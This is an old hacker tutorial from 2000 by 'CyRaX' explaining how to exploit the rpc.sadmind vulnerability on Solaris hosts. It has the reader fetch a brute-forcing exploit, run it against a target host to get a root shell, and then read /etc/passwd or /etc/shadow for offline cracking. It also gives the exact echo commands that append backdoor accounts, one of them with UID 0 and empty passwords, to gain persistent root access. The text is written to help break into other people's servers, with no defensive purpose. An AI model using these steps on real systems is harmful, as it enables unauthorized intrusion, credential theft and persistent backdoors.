rpc.sadmind (27/02/2000) ------------------------ The bug rpc.sadmind has been reported a long time ago. But there has never been a manual for it. So i decided to explain how to exploit the bug. First of all i would recommend to use the sadmind brute forcer for the sploit files sadmindex-sparc.c and sadmindex-x86.c , you can find the brute forcer at http://packetstormsecurity.org . Search for sadmind brute forcer and the file samdind-brute-lux.c will be the first file you'll see... You compile the brute forcer in the same directory as the sploit files. Run the brute forcer like this : ./sadmind-brute-force If you don't know what is then you do ./sadmind-brute-lux You'll understand now =) When you have found a vulnerable host (you can scan for RPC stuff with RPC- scanners LOL) you do this for example ./sadmind-brute-force 1 www.sadmindvulnhost.com If you're dropped to a rootshell now, the host is vulnerable for real. Otherwise, the host is patched. Now you're dropped to the rootshell you have 2 easy ways to exploit the rpc.sadmind bug. The first way, this is kinda lame, is that you view the /etc/passwd (or the /etc/shadow ofcourse) and then crack the password file with a password-cracker like John The Ripper --> this can take years ! You view the /etc/passwd like this cat /etc/passwd; The ; must be added ! If ya type cat /etc/passwd the server will recognize this command as cat /etc/passwd^m The second way to exploit the bug is a lot faster then the first one. Here we simply add two users, one with root privileges ofcourse... This example is for a host with /etc/shadow ! Type this at the rootshell : echo cyrax:x:UID:GID:cyrax:/:/bin/sh >> /etc/passwd; echo cyrax2:x:0:0:cyrax:/:/bin/sh >> /etc/passwd; echo cyrax:::::: >> /etc/shadow; echo cyrax2:::::: >> /etc/shadow; Dont use > instead of >>, >> adds a line, > overwrites ! Replace UID and GID by 666 for example but NOT by 0 After you typed this, there will be added two users to the server : cyrax and cyrax2 You login with the non-root user, cyrax, and then do su cyrax2 and set the password for the users ... Now you have root access to the server... Written by : CyRaX (cyrax@antionline.org) http://members.antionline.com/cyrax Special thanks to : nostalg1c greet[z] : kemX, Cheitan, guppy, |llus|0{\}